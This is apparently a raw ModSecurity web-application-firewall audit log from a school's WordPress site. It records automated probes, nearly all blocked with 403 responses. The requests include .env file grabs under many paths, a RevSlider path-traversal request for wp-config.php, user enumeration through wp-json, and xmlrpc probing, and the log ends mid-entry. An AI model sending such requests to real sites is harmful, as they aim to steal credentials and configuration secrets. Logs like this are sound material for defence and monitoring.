Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745787382245446 1090 (- - -)
Stopwatch2: 1745787382245446 1090; combined=507, p1=468, p2=0, p3=0, p4=0, p5=39, sr=122, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ce28326a-Z--
--b4f8bf12-A--
[28/Apr/2025:06:00:54 +0700] aA63Jmj1i6BJZll4jGOt1wAAAIc 103.236.140.4 41178 103.236.140.4 8181
--b4f8bf12-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 194.163.159.240
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 194.163.159.240
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Accept-Charset: utf-8
--b4f8bf12-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b4f8bf12-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745794854965512 748 (- - -)
Stopwatch2: 1745794854965512 748; combined=316, p1=284, p2=0, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b4f8bf12-Z--
--f1ca5a28-A--
[28/Apr/2025:07:33:47 +0700] aA7M64_5LpLtj_OTfS_UqgAAAM4 103.236.140.4 34426 103.236.140.4 8181
--f1ca5a28-B--
GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--f1ca5a28-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f1ca5a28-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745800427536361 1034 (- - -)
Stopwatch2: 1745800427536361 1034; combined=389, p1=350, p2=0, p3=0, p4=0, p5=38, sr=114, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f1ca5a28-Z--
--47255d5b-A--
[28/Apr/2025:07:33:48 +0700] aA7M7FT4soy9XydcuKajggAAAFI 103.236.140.4 34428 103.236.140.4 8181
--47255d5b-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--47255d5b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--47255d5b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745800428242237 959 (- - -)
Stopwatch2: 1745800428242237 959; combined=371, p1=332, p2=0, p3=0, p4=0, p5=39, sr=119, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--47255d5b-Z--
--a84b0771-A--
[28/Apr/2025:07:33:48 +0700] aA7M7I_5LpLtj_OTfS_UrAAAANY 103.236.140.4 34434 103.236.140.4 8181
--a84b0771-B--
GET /api/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--a84b0771-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a84b0771-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745800428698742 759 (- - -)
Stopwatch2: 1745800428698742 759; combined=340, p1=297, p2=0, p3=0, p4=0, p5=43, sr=98, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a84b0771-Z--
--8cb03a3f-A--
[28/Apr/2025:07:33:49 +0700] aA7M7VT4soy9XydcuKajgwAAAFE 103.236.140.4 34436 103.236.140.4 8181
--8cb03a3f-B--
GET /laravel/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--8cb03a3f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8cb03a3f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745800429043082 766 (- - -)
Stopwatch2: 1745800429043082 766; combined=332, p1=298, p2=0, p3=0, p4=0, p5=34, sr=137, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8cb03a3f-Z--
--c297c15c-A--
[28/Apr/2025:07:33:49 +0700] aA7M7VT4soy9XydcuKajhAAAAFA 103.236.140.4 34438 103.236.140.4 8181
--c297c15c-B--
GET /test/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--c297c15c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c297c15c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745800429391431 665 (- - -)
Stopwatch2: 1745800429391431 665; combined=254, p1=223, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c297c15c-Z--
--487c4347-A--
[28/Apr/2025:07:33:50 +0700] aA7M7lT4soy9XydcuKajhQAAAFQ 103.236.140.4 34444 103.236.140.4 8181
--487c4347-B--
GET /admin/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--487c4347-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--487c4347-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745800430173044 807 (- - -)
Stopwatch2: 1745800430173044 807; combined=314, p1=278, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--487c4347-Z--
--12e11c66-A--
[28/Apr/2025:07:33:50 +0700] aA7M7lT4soy9XydcuKajhgAAAFY 103.236.140.4 34450 103.236.140.4 8181
--12e11c66-B--
GET /vendor/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--12e11c66-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--12e11c66-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745800430625648 790 (- - -)
Stopwatch2: 1745800430625648 790; combined=288, p1=239, p2=0, p3=0, p4=0, p5=49, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--12e11c66-Z--
--5e13b578-A--
[28/Apr/2025:07:33:51 +0700] aA7M74_5LpLtj_OTfS_UrwAAAME 103.236.140.4 34452 103.236.140.4 8181
--5e13b578-B--
GET /sites/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--5e13b578-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5e13b578-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745800431377582 821 (- - -)
Stopwatch2: 1745800431377582 821; combined=311, p1=275, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5e13b578-Z--
--7bbf3e03-A--
[28/Apr/2025:07:33:51 +0700] aA7M78JruAEpaSEZ7DC71gAAAAc 103.236.140.4 34458 103.236.140.4 8181
--7bbf3e03-B--
GET /blog/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--7bbf3e03-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7bbf3e03-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745800431723300 832 (- - -)
Stopwatch2: 1745800431723300 832; combined=317, p1=281, p2=0, p3=0, p4=0, p5=35, sr=84, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7bbf3e03-Z--
--1e0a217a-A--
[28/Apr/2025:07:33:52 +0700] aA7M8MJruAEpaSEZ7DC71wAAAAY 103.236.140.4 34460 103.236.140.4 8181
--1e0a217a-B--
GET /system/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--1e0a217a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1e0a217a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745800432069700 737 (- - -)
Stopwatch2: 1745800432069700 737; combined=302, p1=271, p2=0, p3=0, p4=0, p5=31, sr=114, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1e0a217a-Z--
--9469217c-A--
[28/Apr/2025:07:33:52 +0700] aA7M8I_5LpLtj_OTfS_UsAAAAMA 103.236.140.4 34462 103.236.140.4 8181
--9469217c-B--
GET /public/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--9469217c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9469217c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745800432414692 702 (- - -)
Stopwatch2: 1745800432414692 702; combined=280, p1=247, p2=0, p3=0, p4=0, p5=33, sr=89, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9469217c-Z--
--5193e92c-A--
[28/Apr/2025:07:33:52 +0700] aA7M8FT4soy9XydcuKajiAAAAEA 103.236.140.4 34468 103.236.140.4 8181
--5193e92c-B--
GET /shop/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--5193e92c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5193e92c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745800432918571 837 (- - -)
Stopwatch2: 1745800432918571 837; combined=320, p1=284, p2=0, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5193e92c-Z--
--e0164e44-A--
[28/Apr/2025:07:45:13 +0700] aA7PmVT4soy9XydcuKaj_AAAAEY 103.236.140.4 37064 103.236.140.4 8181
--e0164e44-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.86.63
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.86.63
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--e0164e44-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e0164e44-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745801113073222 3330 (- - -)
Stopwatch2: 1745801113073222 3330; combined=1448, p1=451, p2=968, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e0164e44-Z--
--7de5231e-A--
[28/Apr/2025:07:45:15 +0700] aA7Pm1T4soy9XydcuKaj_wAAAEg 103.236.140.4 37076 103.236.140.4 8181
--7de5231e-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.86.63
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.86.63
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--7de5231e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7de5231e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745801115466015 2958 (- - -)
Stopwatch2: 1745801115466015 2958; combined=1356, p1=456, p2=871, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7de5231e-Z--
--9f49a403-A--
[28/Apr/2025:07:45:17 +0700] aA7PnVT4soy9XydcuKakAQAAAEk 103.236.140.4 37088 103.236.140.4 8181
--9f49a403-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.86.63
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.86.63
X-Forwarded-Proto: http
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--9f49a403-C--
demo.sayHello
--9f49a403-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9f49a403-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745801117826386 6597 (- - -)
Stopwatch2: 1745801117826386 6597; combined=4830, p1=577, p2=4044, p3=28, p4=31, p5=87, sr=77, sw=63, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9f49a403-Z--
--340d815e-A--
[28/Apr/2025:07:45:33 +0700] aA7PrcJruAEpaSEZ7DC8tAAAABU 103.236.140.4 37156 103.236.140.4 8181
--340d815e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.86.63
